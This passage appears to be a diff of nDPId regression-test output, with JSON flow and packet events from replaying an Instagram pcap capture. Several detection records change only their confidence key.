QJNQYkzMCJYBBrMEEpQIDokIJwkIUoMSToBClAEGtQkEs0YClHRYk1pBIMwbNQYgnSYgLIEBwkICyYhS0tJCxFthwmkKMASVmhAWbEE4TSQsgIGpNBLIRBQaQayBJOAEBwMQFpAkukCQsAg1kwjMMCVgRGahtk4ASFmDYdSCQtbGjUbRJdAkBZDILMTalGxBqU0hLiYmGDXVNCjMaUrANmsIQlZttqUY2w4RFAcShClECQoCSlwmETgBsKNMgZsSTpAgKSIlGYICyESVkBBYBBqJog4E0E4TEB0gQHA00FqGlLhuKTNQINQJJJZgg1KY2ZpImFGNJLDSTWQIWFASXDBBg5BGoAgOEGEajpmg1hCCcIEEswQl5DSTM00EswQFATalGCCUYJJRg2oGCQsxoSswQow0lLgQhSgCDUGkBYEkOEDYdAIJZgk1ESQpQcUhRsSFGCQZgklgEmZg2pZyEBZgglmMiWQkhRgkOBoicSMiWbSDWGJNQBJOAMAKVVMgYiIUahNE4Y2wsNICwNCXUCIlmDRuGk2S1NsLUYIJwRbZrDSAo00GsmINQEkk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1436720900745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720900745,"pkt":"ABsv8H60QPMIw47hCABFAAA00CZAAEAGPJfAqABnUlUaouJQAFA6kgzsKZIiVoAQH3QuLQAAAQEICgAD63dWCy9b"} 02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1436720900872,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900872,"pkt":"QPMIw47hABsv8H60CABFAAW+QeVAADkGzDdSVRq5wKgAZwBQ4m1aOHmGBPBEEYAQAktTqQAAAQEIClnq0tYAA+t6pEVxjNbEsTo05BJiqWC+y9Cm00IuBsqQ3OjXYmls3ooNNijoaA4JvaGXA6WBNFUSNxldWicRkqfSvQ+ysT9n0voZ+EyJR6Oy8JFg5mjiK3jhnpErGpjhG8skeRODdCdQ2MDy8miGRvQk1oSZFhVmGQ28jcag3sVEigomNJgo2R5DYnSdEiIuyPaJg2JvQlTQl7HH2PCFhjS9CYo0RCdlSaY2qVbA7SVlukMk60Nrou0FvVb7YyZLsTJUNNjXYcKjL2NNBHY6YRIqyEsm+g1byhIVtLCoTuULeROaIZSg30H1KXibE4I6MNQaNsuwl6EmkRW2hNPKHVGvY2h4LXCptXgsREUx4KkzYc6itsZrGceuCUwiNvZ0NlpU4bHVgOMeBQT+hXsW4NkxniYRKY0LOGPOuJ3wxvNY30XInTbyUHSrYx3BbGhCWhOLAjiZyQZFUJdjY3cIt4ZOkJvIlCy+hRiRG+RuPBllCy6VrIsIWMN5wEbUZGNRwXYxYMsCZvBM0SI+CRpDbsamyBbROyZoo8CJEl6E9mJ2S8EM3LEKN5FGYSlBs8UdkxmA2mpRC0zPZ7xJ9CwL8H7GJMEIRrTFqwKrYnyiJkSFrOodENU0wTGWNK2jlI9lfZlilokuhJLsxJCYIN4hejdRoOrIspMTJA01hjZUKPFINeESqCUMEQXvhWETJONsmi4g1wbPQfoNvgSpYMGCvY9YNIqvA3SQSmRLI4YPo2XNMYImYP1DY4jPgTTw2RtDTZj2bUhs0VbI6JdDjHkaG0not6KSwmmsQgk2Q2d8EY0NThbnDb6LikplbG2dZcC3WN4yZoyEhYNBej0BWx7I90tpJlyN42ZDbInnJ1C1j9i4ezDdGzUCRBRluhyJbIYWhtD6NOhqmcKFroh5EphFtxoj0LHA27N4EuzbHNiablHlZGpBOsMNmxNFXQsIyISmhtLI00bJ7F+j1S+jDRaWi3vmNnZe2dMzFsHjJciezaGpgnsUwLB9OsnZ3niE9jVXaWBDK2XAvaENk6N0ekQ2O9mkVid2JeCeikitCaY2qSMSexWxPhK4FBtCR+iXk7ssgLA2L0SCdTorMmVWF2XC0NTE0Jx1GuCltCJQTg1LLSyaM2UJLoSF6DFF9Mw9kaL7IKmI4MmxmzPiZWtisp9MNxiCdRNs2PYXFI7EHTI1SpITxUMwngXpkyZLmoTeRzsWCnZ+DfRVtifokzCxuYoykLQuIaLckmHw90WsHeOLnJ84eDeStIr0XApBloXsSFOuGxPJSo9D4JV5INNsaqEnFWmLKwNNiDhZETR+8N0hPQnDfQ9jUeRJC3L2abSUYrSyXKQvTLUJ0TMDXTG22NpLA+h7pbgbPbEFhURZQjQj9GNi+DZGcFGLsjYTTQlYRp28M2yQyxotDecoU0R2IEl2iJYG4illoT0E0yNMauOGKUSPA0mRrZpNHQ9mUtCe8LiDqwZ6FGTD0YCawPKG6VPR1B6om0oVtJszsT2oPLg1iChibE3sd6Emqj9QlcmEXhv0J3fFLW0UaJbG7obENhs2LInSGhYWLA09oR2MwU2WaOiiYyFETeCZiGhtrYmeGRtwUYEs5HJsYE8FFhHQyA82YMmWhvJ+luERPJpCaXRrgavgriCd7HBcZJXUMHg9aNwpE0U5guCZyNlQ8sSjo1kSMsTUUFRQbOhYwhtnKP6SOXI1R12JOnuIeq2VMpZgm+hdg0iYglGUXsWqM1gbLTRccdQh6Ku0exnodIIyzBObLeyzRbgl2MPIvcF+DTaqR8HaG7s1kuabRjJ0TpPR2VPJV7KLKyJPRF0V2DRrKEZhaNsjpZo9uNoKHwaJdi0JwbUojVhqtMTJ4I0NdDcP0bBkIaxSOjsCQm08MyRGoPKyP2uPoVQ="} 02372{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1436720900873,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900873,"pkt":"QPMIw47hABsv8H60CABFAAW+QeZAADkGzDZSVRq5wKgAZwBQ4m1aOH8QBPBEEYAQAktstgAAAQEIClnq0tgAA+t6yOoxEtjJYMe0j6G03geIuahaK1oTHsEliMMTZ8IV3w+jNLnJcKpRQYoNH0Q1owU7ElIg1BvY00M1sKh00GrYYaKmxapIfSuhKlliV5Ggz2ZEdUXqEuURYhcRmGdF6HkVYKkoGKmh3bGvRvDFLCRD9sysMedkSiftieCrscIysGDeGZuR52JNFJwy1gdIqmuE8SC43k2NNmXvnK0LZ7Q9kdYKlspkg9CZoqhXWJtbKpgafXBrJWhOsqdlcjGlMIf02UEyYUEoN\/R3BPJjY2bCG2s0iEvRRNQ+jO4xqKDwyI0ohahosjThi9BIrI7gehuDWUCCJLBXotaGI3Qlg0wJ4IVBKoTow2PA\/UqeR2ILqdQ62OGMraO4hekPhuNoceBSE3cCJmskaK+hP2IZK1kxs+D0NwaUQbYMYurNlQeMoTLYsrBUslTyTGB4bJjIpUh1Csyxlol2o3gucCaI7VzLkaJHRLOOI9DqwQy9GXvictCZRvBROF7M75lwMNqMbA1Q7yIm8GJWsFybGm8jbOi8hKnkr2M2jAtIEustYo61E\/YmmP6L0b3whJbGvRDYcGUzATfFIDVQIw2Oobux01kTo0N6FINdmGBYdKOUophoRJtodkbFVo9gsdiVGqholRuBaWjGKEmDKSSFXnjQZrsSagmHGQ2V6YSOqJlWjZkzB3BjS9mOWLBMSDwqGspicFTSY2vRnKTsOEJT6izJU3UzZMYLFNbFHhcKrhEElmjUHgsGw3eFliqL7LktKtGhuCzshGkdcMxokwNDSEy0x5WRazwkNsaY8bLNjG6JXCGsDRGmNiieYQKFSLNMh9GJBBqDcYmQ\/TLYs4Y5okeCCq6KrROsWRPA\/QgqexNDwJeyORUtLVhijncHacZgTImKglDuKPKPiNMVuBBPFGsVisByZlsa7HsdRZxjrKIyEiLkwMS2JuxPlJTJB8H6bZlkrSN1n4byX0J4EzWxRB5yNNiRbIpUIU6KJCXaHjR8G5KJ9CS9nWBuYG8YG6i9HshCfoTL7I9i9svs2S0igzvAmIqQvhrDHLkQf6KrgpKCatLEWjeRJbOsDeINKDg0ui5F0zaibWWN0bpi9BWZoEHKMpILVMCwVlji1gwwlSnhCVWC+iHqDPofxpWqTM0eNJ2xqh8YRjmCGxosC24xO6HlDsYiabHsVY3Q2j8FwXDnhHTop2I0ZBKKmqh+g1MksMLJUzHQ4tCWBioqFxpAlEhOSDo8Dagmn2S4NI9pDj9P0qphlFmxt9ob7Q4fDeWdIS9mSomrgesCHk9xVyISbeBYZYqOnkRY6Qi+xNoTGi3wtcJ8IdEGuiiJs+CUCzHWBIwyehKjUWCjSYQ2xehJQkV4bmCDSE3ajpBI9MbbKsnYhMqSE6SoSmxVZQz7F7Cxw52a0Oi4wa6G80SyNISCZNs1kTWjAjbEjBSIX0JgVNEej4YLk6FUNkLSpOMieS4G8EdEeg2KpGUxUsEchDaYw1FYKjISLZtH5xdj6MjnZrR0KQaPJCYqtCpZNBN3Ym8GJNCRoeRqPAyVRi2Jvp8EoJ4hRsvRtEZTjFNsRZ6Lg1GM+iyL6KpBqRssXcg5w2Ui1l6HGqjFFnaPpYhNtEfI6Fk9p+jWy+h1jWBucKo6btHQ1cIbLY6jKwI1kTtCe6OF7GyQ+luTvB+OCeRZE8Cjzw\/QQ2lsbbGNL0REErSTiKuDRksFTw2JZIJTbY1oaZGzXwTzsbdEiLmog0Ji7YqmN+hroiag0PQeUVDI9mcQw6G101ZROVMQtGQ7eH6WaIbNDwsDsK10NpNDbcMrspisEOJISYYqTRU0RDqgVWGQxaXIsvmpFmWPDA8JDDqHRSQsC9DYnnBYhpbF9KmJvaYk7Ktm8jfrhZcJnL5r4twNjbk="} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720900692,"flow_last_seen":1436720900873,"flow_idle_time":7580000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":1031,"midstream":1,"thread_ts_msec":1436720900873,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720900692,"flow_last_seen":1436720900873,"flow_idle_time":7580000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":1031,"midstream":1,"thread_ts_msec":1436720900873,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 02391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1436720900875,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900875,"pkt":"QPMIw47hABsv8H60CABFAAW+G2lAADkG8rJSVRq6wKgAZwBQrVt8zLRbo9aCTYAQAxSDewAAAQEIClRjBa0AA+t+qDhdSVH1chUH1JtbCJY\/b9U\/35z\/AIcB2iAbyHujCEFNZ+I0eU8EOIX\/AEB\/qRwVo9Wlp5znKiVYRroroyxNdVdiE6kdYXRMS3KcwBs+EyuWZYuo52fCGCiRaGhDCm0eStltza5zDLVQe2oxt2qbSrdR5pHTZPJaAK7JTxSrekwfflKFROdJwg5Y1CyNVSaHSVxDS0CVTMOVI9v3UgC122i67XHxCfXa5p2RquKuPMJ1XpUxG6NIvp3blVKRpiVRMtCZ59+YOFU7DcnU6dTOhRpECHZCLSwomfujLIK9xojog5ZGQgQ5VGxza\/YotDtEQRr+RTZe72UhDK0U\/Sg+fuESn9pT0VTtKEFOlWOQYBlU6VNyNOjonUmH0p7LdOTSD6k6C1Oj5p\/wckoMOHKYPO3tlU9WFVKbrygB07fGU4txhOccQn+qSgN0CjqgJbEqm5ow5FksvA7VeZ7f3Tajd904VNW6JjQ5ncntFPTPhDtGVPjVZB91ncoRE8oIyp5N9S4cEODlVJp1JmA5fEBxtqYKqUOqP+\/zSg5U2tcI3K4r1W6whjKbVcNE4l2TyDtij7fIFHV4f3CoGWKuyWKj6ICHjmTYVF4grovG6HUCdTvzon0H6hVh+C1MMIt8ICE07KNwg+cFOZuEeTXFquDtU5vj5onCADRCuEIOGmi9bcI9qe6Hh\/lSnr\/LyBA0QtO6w38TUIwWwCvsgy3VFt7sqxzT7KwyZTqc5blYj3X06flx+dK1UrEqM45DARcbWwqkkymmJC+hEywLVAnRSFLZ0Uh2F02s75QrdN3lqFtZuO1OGwcuGqOAgqpFMWFAx6lcXdgGuiNNzYCtMzGE+FGJWdEJR5BUG9p91xTbqM+Ewy22pp5VKoaLu4\/b5BzCouE52V4uc5eoyu2IHzQgtMrhTPaqXY51NHLYVLteWrXnUbcEx1pUhytVgUIjzlVKH10\/2UhqqcmlOQfGqIDtF7I45NMpzflptJyiG\/dbyiJTaj6ZTiKrbmo5ZHhMMtRKf5RzypychE\/TsrBP6osiBO6jfYoVBq4Jz6ZGNEfUA7KqOaIsRYcFuUx8DCcaZ9QXSpu0cjw7\/pyoI1\/xGLV7rflJtjkMIOwg4rTVSeRlD3WuyIIAXoy5qI\/DENgr4jNzxlPqdUrUhEuZmFfdl26N8xOAjGpXr9KDMp\/b2cg5m4lf8u76E2rRtxKi+mQqYlpb4VNj\/S8YREfJPzBEfKCVMohcObXqr2Vg\/wAoZTxbXnyhp8j25QMIOKL0AdeU2PhcRSg3t3TXfS5FiaY1TvI5B0JrhqnsZU7giFog4OwU4cxkwtBCPLZaoE0nIgeoaJuJatkdORVDu7Toi3xGE7KLogHZdS37K7Ca7OUXI936Koe0CUDyCBTg2qId+6LS11rvzZ\/KZqoJ5brPLTlEqFoVKuOCobMhCqWm1Q6YKtduV+OT5hOoPnKDcL0EYwpFTRQ3Mp0GIELLsnZXv0CudC115sBLwAumQ2Vw7vxLTo5VPwqxxKbWp7ynCfyJwpUrqNIh3yxATdVsqUmqFUZ1GLh3EiDsq7e27wm6IhBQnBQoTGSZPIhVh23eFh7IKLc2ldzcFEbpr9kfPNr\/ACqudEeV550hHepk45Bao6qoMSqTx6XJ4teObhypm39E24i9wQd3SVUI2TsnKnZXYgrJ0TO3ITjPIK5XJpVRvVb77f4WZ5M9QUG4hbcsrbkFK+3INkwoA7TsrTspB9WEa3bnXyu5xl6p1XUk6qXbo5gxgJ\/cwRsi0jVNBQLtxhXSSSnFzk4QMr6UQYley4MfidR2jVVqGpk4b48oVXdZrzsuNbkOCHDuPc7tHvycN\/ywOYTlupwuHbm9bJ3Y8P8AKIuCpnCBwsSgii1WocyEzwuKp4s="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1436720900876,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1436720900876,"pkt":"ABsv8H60QPMIw47hCABFAABQv9ZAAEAGTLPAqABnUlUauq1bAFCj1oJNfMxlZ\/AQEUsuYQAAAQEICgAD64RUYwVLAQEFGnzMtFt8zLnlfMypR3zMrtF8zJKnfMyYMQ=="} -00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720900690,"flow_last_seen":1436720900876,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":773,"midstream":1,"thread_ts_msec":1436720900876,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720900690,"flow_last_seen":1436720900876,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":773,"midstream":1,"thread_ts_msec":1436720900876,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901182,"flow_last_seen":1436720901182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720901182,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1436720901182,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/BAAEAGs3DAqABnTUMdEYS4AFDrYaSj8+woZ4AQH+origAAAQEICgAD66NkobAz"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1436720901182,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/FAAEAGs2\/AqABnTUMdEYS4AFDrYaSj8+wze4AQH+origAAAQEICgAD66NkobA0"} 02385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1436720901183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720901183,"pkt":"QPMIw47hABsv8H60CABFAAW+nH9AADkGdFdNQx0RwKgAZwBQhLjz7DN762Gko4AQAq9DyQAAAQEICmShsDQAA+ufWEdJBRPnaSmosKHYDmQEyGHV3GAwTrGe5kQxyGEYyxmyELBrJc+SMi3dmmwq1mAYjd9asgZG6SWIbmuecSeibLvJUKPOw0JlNLd+SsFoR4AyWWZMuWzjy22t8lg9nL1yby0j7G5yGHP2UfvrthqhUQLZPhRPRii5ZImLbbxtBh75Nwi10QstpiiOURwgsk\/gse0fhODW3xEaIlCTuwGMxEsajO6KBwgVZE4oD8EZJ8CUI+IftidbAnEAzCB+CxiXeSUkT7I4PLvoy1NnMNCUuGI63ybZNQBpkMtmgmFlmfthxhK9DguCw4XPNprshLbUVoAbHdBaG0WibQPaUDoawN0QnEMFu5OOsEXu+c3ydgozRy0R9FbV0F8hsoSyHLIicGyGMakQqAYSTks8J\/2+\/kORfizOWuAtMcMCSaUPfEY6f\/ttodWXWPLX7bzs5o8i2FH5IZ4wLEpEOhwV2MADYJIWDBmF9CQdn6hh1kzmvWM7b4SuFg+iI0QmrTgRgMl\/rAMZDtwdyKQyk+DPksJTgtrhZZRA\/GY+X2oyKfiboDY0NouOzUthrGCw4ToWxqMKM+rf1sDDAEsjSzJB7rCfcDOwibANVH23SwWhh5rFCY04ksXdhurOKpIBQXzCwN2yHF8S1j2hc2z0kMsCW+OeS+e5HaaRoyzZaCzPNrgnwkhY7i8yZQkeMkH4woSzgHZw7AMoJTs5nD21BiRDuFCBqB4lGX+kk55UTfE62aMJ9jBPBhqltnyYDTEarQKEsWGbVjV7cRHRc\/JgmbZkQlW0YI\/xZdFg6wN2R+J3fOBbBmIcOvB5bIKiWTEFFXRESk7pA\/G3UwXXKB8XDGTJIAkPv49GZuMRZBkC+FhZzCzZ\/iYJh8LIJjV10uzY7Q6E8RpFbyee3Ru25UC5ETbDsFPCaR1ZZC+Qlrsu3Z2QOnm5Ijct96wHLCiQoCUx5CFCGTynRCNjadMyB8tlLRKCwv7KX++dvy1I4Ngs+X8bALTsRQ81XIDydJihBYicmO+O5EykyOu25b+jIYCOXX2WfISuvyX8JiI2GJxqYZEg+OZPoDhxBrn8TYtguClNRehGIQDtqZcwjb\/V86w0sQMOHMZzpnYBjpA8i2eJoGlmik3CQHHMRm8DxLkyFvCZWDFGTUEVI6mHEnfCoaSoN+\/pJIKAlCT4XxDOVC6F8g19jfq1eEJAj0k3u3yFtEJC0DXJolurtJkzJ6y5KHJWSGujZ7ucFS0YjpIoSX0blPAySPJvg33fP2OLma7cQ\/o6PyUHgctick8cobWRNWzIJG3koi8vkKbBIHEMIhdatBUZ40kmN4wtVBz4xoAKljf4v6tXAUt\/sabl0bLkuRE5KikyGgBCbojsrcdwSEGEBomIUFpEl4TvPOqQ8EQF08if3O9FnhnUw2jwQHpaPsw+3EzgNs0zWy6OB623FWGwH7yRctwfDWnw6uSz7AvbHpmHBs+lzanaBkBBq2DLF24dyAfJ1fyW2F8GD9sWLVnjCGZF3EsLst8bQIxxKOwYkoOS2WRsw0xVMJlnywe3Dcc8w+9gQNiBfxyDpYA\/BXzFgEQ3SDtI\/Iov2XBZk1lmPY59tj\/SH+23V5dy\/iiOkLW8UdeiSozNTMFJIdoa309Kn34h+DTnlxZPJVqKRj7du3Uk37CetFC6vFxS2151HHC6aWXemK7B3BpAILjJ\/RL8v0ZA5dOz14w3bAaJWBEg+oUMkesS4WzNnMtGFzWDqZOmcWARMZvW5QUXehDRGok1aYS2VUwcI4nRFkmR4HYk3YsQQ7hbSjts4wBuESi5cIWAPkICk+lgVslThZsIux2ZS+mHik4DwoYI7IF8QlYXTsSiw2By7i5s7AeQhpAzljeQfkQaQPQMK5P3IVCAQHZWMgI="} -00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":255,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720900690,"flow_last_seen":1436720901259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24614,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":1436720901259,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7580000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00816{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1436720901262,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":324,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":324,"pkt_l4_len":290,"thread_ts_msec":1436720901262,"pkt":"ABsv8H60QPMIw47hCABFAAE2VBZAAEAGt67AqABnUlUamZHmAFCdoJYSxR9Z0oAYDfbnvwAAAQEICgAD66tZ6cc2R0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMjQ4ODI5Xzg1Mzc4MjEyMTM3Mzk3Nl85MDk5MzY5MzRfbi5qcGc\/c2U9NyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWEuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7580000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-a.ak.instagram.com","url":"photos-a.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11248829_853782121373976_909936934_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7580000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": 